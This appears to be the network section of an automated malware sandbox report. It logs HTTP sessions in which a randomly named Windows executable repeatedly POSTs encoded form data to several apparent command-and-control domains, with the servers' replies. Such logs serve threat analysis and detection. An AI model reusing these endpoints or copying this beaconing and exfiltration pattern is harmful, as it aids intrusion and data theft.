                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.duskgazes.work
                                                                Referer: http://www.duskgazes.work/zs4o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 6c 30 6c 4d 71 4d 58 39 2b 51 2b 77 38 71 69 6e 56 35 63 4c 5a 6c 48 31 56 46 39 4e 45 67 63 4b 43 6a 6f 73 6c 75 67 75 52 4b 6a 54 64 51 44 63 4e 78 31 76 6d 47 62 54 36 6b 37 70 52 74 43 78 4a 4e 72 34 50 4f 6c 35 41 62 71 34 6c 47 68 6d 6e 76 4b 53 66 51 74 77 73 42 51 54 48 67 53 58 52 58 65 49 58 59 53 4a 54 54 30 36 62 77 31 77 55 33 37 58 48 77 59 42 68 58 43 75 56 48 46 78 38 38 4f 69 74 50 69 37 41 75 35 65 75 6c 64 78 4c 67 76 70 35 52 57 58 58 41 52 41 31 74 72 7a 55 52 4b 56 36 72 32 63 48 77 54 71 70 65 55 69 57 77 49 31 31 56 4f 4b 76 69 30 34 36 44 38 39 59 34 76 56 45 56 52 64 35 4d 55 62 36 42 30 66 58 79 37 6c 5a 6b 66 68 62 6e 56 42 2f 61 68 6a 6d 55 78 67 2f 54 63 5a 4c 55 43 6e 6b 75 33 5a 37 44 5a 52 58 4c 2b 6b 74 38 36 32 41 2f 68 4b 57 78 33 52 73 30 41 32 54 5a 4d 75 70 6c 36 6c 49 71 7a 45 44 7a 5a 51 4b 48 7a 71 58 32 72 4d 30 4c [TRUNCATED]
                                                                Data Ascii: Ebfx6=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDl0lMqMX9+Q+w8qinV5cLZlH1VF9NEgcKCjosluguRKjTdQDcNx1vmGbT6k7pRtCxJNr4POl5Abq4lGhmnvKSfQtwsBQTHgSXRXeIXYSJTT06bw1wU37XHwYBhXCuVHFx88OitPi7Au5euldxLgvp5RWXXARA1trzURKV6r2cHwTqpeUiWwI11VOKvi046D89Y4vVEVRd5MUb6B0fXy7lZkfhbnVB/ahjmUxg/TcZLUCnku3Z7DZRXL+kt862A/hKWx3Rs0A2TZMupl6lIqzEDzZQKHzqX2rM0LGLKn12nrHWfAjmII0ij5Acinzww3RbJ9YTIcYxEobSFoKUoDnc/jqt7cJqYX9CL5+k0QGj0Di4Ecsc/GrFkWURukNbHKhi4eSe87sotcfeUhKIXeR94Z8JrcaUif6BWYXGM8ECPQvCwC2XZUE8/dncY9dYtDp926Ge9FKt1gus26yF73mhslmjfunAB25McBHDuWAGmcyleaFFbKzpbMT41Aw0oCghsEv4GN+CKt99BsKACZwcH3I6zplZln+IcwIuN/0fhBF4zz9Bkek+QJAnDvpO94L7iPjFcFC0ibaniEyuWpYBkbr7Qn82c0t8goiUAocv72L2B8Fr6x+/uTexBQWAvOJ5Qb2oGL5fZX5EZfjakh3FuakmCRcEnj8gEdBgE+eLpkF0jLh5zYWGn/Cl/K/iYL0DrlKMIxLX0b/Dp4nyXQTJ3lw35snYQzahyrBQIYMwdg3mTVyUt7ksXKASL3XDLs7Oyceyv5hpRNm2WbpFeBevARvNers7DkqAKuGW7IvY61WOgl43RsoxGMJY9Q/l7n3RJgasXWoTJLBAMY+Q8hbCCFyhXnIFEyTSiAL9/g4j1NnlnQWYJZozl32qdua5z4qMSEyvNMiy5XIfsGM+QKHVB6SPdEYVpRcezwrlEuf7kY6zSxcL/zX86iHrHWuwr1EujB6g [TRUNCATED]
                                                                Dec 9, 2024 08:44:42.360424995 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.12497503.33.130.190801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:43.956914902 CET534OUTGET /zs4o/?Ebfx6=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWs9osNHqTA3jhptZMXJwhZ2LicMQ2+w=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.duskgazes.work
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:44:45.074815035 CET381INHTTP/1.1 200 OK
                                                                content-type: text/html
                                                                date: Mon, 09 Dec 2024 07:44:44 GMT
                                                                content-length: 260
                                                                connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 62 66 78 36 3d 34 30 79 76 58 5a 71 51 58 77 79 4f 46 54 6c 30 64 31 66 78 77 68 51 47 54 73 5a 6a 4b 43 43 33 4a 57 6a 48 4a 45 5a 38 49 42 5a 75 74 4f 2b 59 53 71 76 76 77 69 6f 68 31 52 42 56 52 4b 6c 4d 49 52 56 78 75 63 55 71 45 4d 57 67 72 2b 46 41 67 66 5a 59 6f 52 34 76 57 73 39 6f 73 4e 48 71 54 41 33 6a 68 70 74 5a 4d 58 4a 77 68 5a 32 4c 69 63 4d 51 32 2b 77 3d 26 4e 6a 6c 64 3d 4c 44 54 74 77 78 62 58 32 76 69 30 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ebfx6=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWs9osNHqTA3jhptZMXJwhZ2LicMQ2+w=&Njld=LDTtwxbX2vi0G"}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.1249751104.21.38.113801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:50.570185900 CET817OUTPOST /xyvr/ HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.zrinorem-srumimit.sbs
                                                                Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 76 32 59 49 31 67 38 65 57 56 43 77 38 43 6d 48 30 35 77 49 73 55 67 4e 42 76 56 5a 6d 5a 37 69 70 32 4b 2f 55 76 68 51 39 30 54 62 2b 68 31 68 70 30 34 32 78 4c 70 5a 30 75 43 4c 4d 77 66 75 79 44 39 2b 39 74 6a 50 6b 53 33 72 34 70 5a 59 69 59 55 72 6a 53 4e 6e 44 6d 6f 6f 30 77 6d 6b 65 2b 47 62 62 59 56 61 30 61 45 75 45 74 70 4a 53 50 33 44 73 51 52 64 79 44 44 6b 41 5a 70 79 4d 74 55 66 63 63 56 44 49 36 37 57 67 41 45 2f 65 34 71 72 51 74 74 51 45 54 64 42 32 5a 36 32 33 30 59 63 4d 69 6d 43 4c 75 6d 4b 55 6c 2b 37 50 33 5a 70 41 41 3d 3d
                                                                Data Ascii: Ebfx6=OmXQT89rv7odv2YI1g8eWVCw8CmH05wIsUgNBvVZmZ7ip2K/UvhQ90Tb+h1hp042xLpZ0uCLMwfuyD9+9tjPkS3r4pZYiYUrjSNnDmoo0wmke+GbbYVa0aEuEtpJSP3DsQRdyDDkAZpyMtUfccVDI67WgAE/e4qrQttQETdB2Z6230YcMimCLumKUl+7P3ZpAA==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.1249752104.21.38.113801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:53.228396893 CET837OUTPOST /xyvr/ HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.zrinorem-srumimit.sbs
                                                                Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 75 57 49 49 7a 48 6f 65 51 31 43 78 67 79 6d 48 74 70 77 55 73 55 73 4e 42 71 6b 45 6d 76 54 69 70 58 36 2f 58 75 68 51 7a 55 54 62 78 42 31 6b 74 30 35 36 78 4c 74 76 30 76 2b 4c 4d 77 4c 75 79 44 4e 2b 2b 61 50 4d 6c 43 33 70 77 4a 5a 61 39 49 55 72 6a 53 4e 6e 44 6c 56 44 30 30 4b 6b 66 4f 32 62 42 36 39 5a 33 61 45 70 53 64 70 4a 42 66 33 50 73 51 52 76 79 47 6a 4f 41 66 6c 79 4d 73 6b 66 66 4e 56 41 64 71 37 59 74 67 46 4f 4e 70 54 53 5a 64 35 51 46 43 70 32 2f 34 6d 41 79 79 56 47 54 51 75 55 65 74 79 48 5a 79 48 4c 43 30 6b 67 62 50 46 4e 6f 44 36 78 43 66 77 39 51 6d 49 49 57 45 74 44 45 78 6f 3d
                                                                Data Ascii: Ebfx6=OmXQT89rv7oduWIIzHoeQ1CxgymHtpwUsUsNBqkEmvTipX6/XuhQzUTbxB1kt056xLtv0v+LMwLuyDN++aPMlC3pwJZa9IUrjSNnDlVD00KkfO2bB69Z3aEpSdpJBf3PsQRvyGjOAflyMskffNVAdq7YtgFONpTSZd5QFCp2/4mAyyVGTQuUetyHZyHLC0kgbPFNoD6xCfw9QmIIWEtDExo=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.1249753104.21.38.113801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:55.898485899 CET1850OUTPOST /xyvr/ HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.zrinorem-srumimit.sbs
                                                                Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 75 57 49 49 7a 48 6f 65 51 31 43 78 67 79 6d 48 74 70 77 55 73 55 73 4e 42 71 6b 45 6d 76 62 69 70 46 79 2f 56 4e 35 51 79 55 54 62 76 78 31 6c 74 30 34 67 78 50 41 6d 30 76 7a 30 4d 7a 7a 75 67 77 46 2b 70 62 50 4d 76 43 33 70 38 70 5a 58 69 59 55 79 6a 53 38 50 44 6c 46 44 30 30 4b 6b 66 4e 75 62 58 34 56 5a 37 36 45 75 45 74 70 73 53 50 33 72 73 54 68 56 79 47 76 30 48 76 46 79 4d 4d 30 66 50 76 74 41 41 61 37 4e 71 67 46 57 4e 6f 76 7a 5a 63 56 6d 46 43 63 68 2f 34 4f 41 2b 48 6f 67 55 78 4c 4f 4a 75 65 2f 63 6c 44 46 46 6e 63 42 58 59 4a 34 37 53 71 4a 4e 50 63 49 61 58 42 53 53 45 56 34 57 32 65 55 51 2f 47 48 33 71 5a 51 58 4e 4b 2b 59 78 4b 6d 63 61 70 51 49 61 48 38 4a 38 69 4c 73 6d 68 78 41 30 6e 50 52 2b 41 35 55 74 55 6d 6b 6b 54 67 57 44 59 69 6a 78 4c 62 44 2f 71 59 6c 34 49 6e 38 57 4f 32 47 56 38 35 5a 73 76 39 4b 63 48 67 4a 75 63 72 37 79 44 6e 39 48 4b 73 30 35 56 6c 65 5a 78 67 6e 2f 7a 46 36 4d 75 61 70 2f 41 36 64 54 75 33 [TRUNCATED]
                                                                Data Ascii: Ebfx6=OmXQT89rv7oduWIIzHoeQ1CxgymHtpwUsUsNBqkEmvbipFy/VN5QyUTbvx1lt04gxPAm0vz0MzzugwF+pbPMvC3p8pZXiYUyjS8PDlFD00KkfNubX4VZ76EuEtpsSP3rsThVyGv0HvFyMM0fPvtAAa7NqgFWNovzZcVmFCch/4OA+HogUxLOJue/clDFFncBXYJ47SqJNPcIaXBSSEV4W2eUQ/GH3qZQXNK+YxKmcapQIaH8J8iLsmhxA0nPR+A5UtUmkkTgWDYijxLbD/qYl4In8WO2GV85Zsv9KcHgJucr7yDn9HKs05VleZxgn/zF6Muap/A6dTu3X7Rp/+2wuSDljTmfWZQkmCTMf1gshHzbtN9A0KYL6C2VEJu08QVObnOPPkLEG359pjCUFcq1bL2r2Hf+hEm56PlAIPA3CxsNKNMX7fhIh9rg//bVLIjahqXF+UY5C27bKtH8xXPu26bwFBDZ+BPR09IkCcn/LbTjt7EraEsN6VyUp7xHgcMgTPJOVZleMcacOQJiN92S9s/R7Vx0unhrTs3tNnRdn2eUatKMqWMEM4VfQwZUdMurYGEt6/ttSzJM5m4waGk5uuhKskHjyLrYeP0LuVlo79rFn/ZHeJy0Kt4BNqC0fB3mf03nXVyoUyINXKKjq1k9dgRDh5OMYASlEULMsC9hchdjHXqnRk+N7+ibRZEB0w/MDTJBScjNEzzSHsj4a1dfyi8O8gTQAlIH7eN40R7J6xs4VUbhoSmTykuO4uEgBMR7Sj9tzjWHWRSEbRijaFQDx7oH0NOPjo1cQ882AO1Ma8P283mfwym/UGrFTbhexan5j9udq9LgH7f7NCsNKmu/SBjrbMToIFbwvuH7yFYVfEiU2rMQSpoPEe/n4X1OztuL0vusr2jQz/1sql6ACxOXknpPcQBm7Y4/n8l0eJs+7/aAhmdP7MSGSKUngV5XrrLfYCJqJPzuL00IiwN8i5Pv96uGV0WHUfMoylONH+rCK6SCLH [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.1249754104.21.38.113801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:58.556433916 CET541OUTGET /xyvr/?Njld=LDTtwxbX2vi0G&Ebfx6=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrpZ66ZcdvUt/dXVK/m2TWNblWa9AhcM= HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:45:38.570445061 CET963INHTTP/1.1 522
                                                                Date: Mon, 09 Dec 2024 07:45:38 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 15
                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOzgbDF2o6luin1mtHQygCl82Qor7p3z5ye1WyDY0HuDTqnpEU5pjHURcuUuJhXO2GFhQ7c1WAWzCLp6eQNHUYdUbQlGf%2BBEepTbrsxYG3nbHWUcBsHWYBajycuu83%2BXdSl70KhcDO6KPAQE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35f83bbe57d14-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=1001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=541&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                Data Ascii: error code: 522


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.1249755103.249.106.91801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:45:44.474548101 CET787OUTPOST /dnjw/ HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.6822662.xyz
                                                                Referer: http://www.6822662.xyz/dnjw/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 54 66 62 68 53 74 34 78 6f 48 58 76 42 35 4a 6c 41 4b 2b 74 2f 6b 75 4b 66 43 41 6f 4a 59 46 4f 30 38 6e 72 51 46 50 31 59 46 4c 55 45 56 50 55 77 66 30 68 78 36 32 55 76 37 33 6c 53 53 44 48 30 57 47 6a 32 77 4e 6a 6c 74 46 70 47 51 6e 31 57 33 42 50 74 42 69 6a 4a 4d 39 64 74 67 59 73 43 44 31 72 4b 6f 76 51 78 6b 79 4a 76 32 54 6e 68 38 4b 32 69 32 68 6a 4c 38 50 76 32 31 61 4f 45 64 36 4b 74 57 6b 74 54 54 32 61 72 6e 68 4a 65 37 54 34 63 2b 6c 77 61 69 65 6c 79 6f 49 75 75 6b 66 6c 66 4e 74 30 42 62 37 4c 6f 77 4d 6d 73 2f 2f 73 50 41 3d 3d
                                                                Data Ascii: Ebfx6=GJG6iV6oNtwxTfbhSt4xoHXvB5JlAK+t/kuKfCAoJYFO08nrQFP1YFLUEVPUwf0hx62Uv73lSSDH0WGj2wNjltFpGQn1W3BPtBijJM9dtgYsCD1rKovQxkyJv2Tnh8K2i2hjL8Pv21aOEd6KtWktTT2arnhJe7T4c+lwaielyoIuukflfNt0Bb7LowMms//sPA==
                                                                Dec 9, 2024 08:45:45.994277954 CET190INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:45 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: d404 Not Found0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.1249756103.249.106.91801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:45:47.198342085 CET807OUTPOST /dnjw/ HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.6822662.xyz
                                                                Referer: http://www.6822662.xyz/dnjw/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 52 2f 4c 68 51 50 51 78 35 33 58 73 66 70 4a 6c 4f 71 2f 6b 2f 6b 71 4b 66 44 30 43 49 74 74 4f 78 70 44 72 54 45 50 31 66 46 4c 55 51 46 50 56 6f 2f 31 74 78 36 79 32 76 35 6a 6c 53 53 58 48 30 58 32 6a 32 44 31 69 6c 39 46 72 66 41 6e 7a 63 58 42 50 74 42 69 6a 4a 4d 34 34 74 67 41 73 43 53 6c 72 59 39 44 58 38 45 79 4b 34 47 54 6e 6c 38 4c 65 69 32 68 4e 4c 34 48 42 32 32 69 4f 45 59 47 4b 6f 58 6b 75 59 54 32 63 76 6e 67 4d 4f 61 79 63 56 4e 42 75 45 55 4f 69 7a 4a 35 4c 72 69 53 2f 41 2f 6c 69 55 59 76 47 6c 6e 31 57 68 38 43 6c 55 43 42 6d 52 34 35 51 66 43 73 55 31 66 4a 6e 39 4d 4e 4e 34 34 6b 3d
                                                                Data Ascii: Ebfx6=GJG6iV6oNtwxR/LhQPQx53XsfpJlOq/k/kqKfD0CIttOxpDrTEP1fFLUQFPVo/1tx6y2v5jlSSXH0X2j2D1il9FrfAnzcXBPtBijJM44tgAsCSlrY9DX8EyK4GTnl8Lei2hNL4HB22iOEYGKoXkuYT2cvngMOaycVNBuEUOizJ5LriS/A/liUYvGln1Wh8ClUCBmR45QfCsU1fJn9MNN44k=
                                                                Dec 9, 2024 08:45:48.709275007 CET190INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:48 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: d404 Not Found0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.1249757103.249.106.91801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:45:49.985852003 CET1820OUTPOST /dnjw/ HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.6822662.xyz
                                                                Referer: http://www.6822662.xyz/dnjw/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 52 2f 4c 68 51 50 51 78 35 33 58 73 66 70 4a 6c 4f 71 2f 6b 2f 6b 71 4b 66 44 30 43 49 72 31 4f 74 50 50 72 56 58 58 31 65 46 4c 55 4d 31 50 51 6f 2f 31 67 78 36 4b 79 76 35 2f 66 53 52 76 48 32 31 2b 6a 2b 53 31 69 38 4e 46 72 43 51 6e 32 57 33 42 61 74 43 61 6e 4a 4d 49 34 74 67 41 73 43 52 74 72 62 6f 76 58 2b 45 79 4a 76 32 54 6a 68 38 4c 6c 69 32 35 37 4c 34 4b 30 33 48 43 4f 42 49 32 4b 71 42 49 75 62 7a 32 65 71 6e 67 71 4f 61 2b 44 56 4e 74 69 45 55 53 45 7a 4a 42 4c 6e 6a 7a 54 65 76 59 38 42 70 4c 61 75 58 74 76 75 66 66 6e 56 53 78 46 63 62 68 55 51 68 51 7a 35 75 38 2b 6a 5a 45 4b 68 2f 51 57 34 61 2f 6f 38 4c 73 41 69 2b 50 2b 76 48 54 30 61 2b 70 5a 64 6c 6c 61 44 56 55 56 72 42 73 54 2b 7a 77 64 59 44 76 74 56 54 76 48 6d 71 38 4d 64 44 47 57 6b 2f 32 76 75 58 34 39 78 62 70 46 55 50 7a 67 43 6f 75 64 2b 69 67 74 71 6e 69 48 77 6d 66 72 34 47 75 42 7a 72 72 70 72 42 76 42 48 53 46 33 79 46 49 51 34 72 39 6c 62 59 35 69 56 35 4f 48 [TRUNCATED]
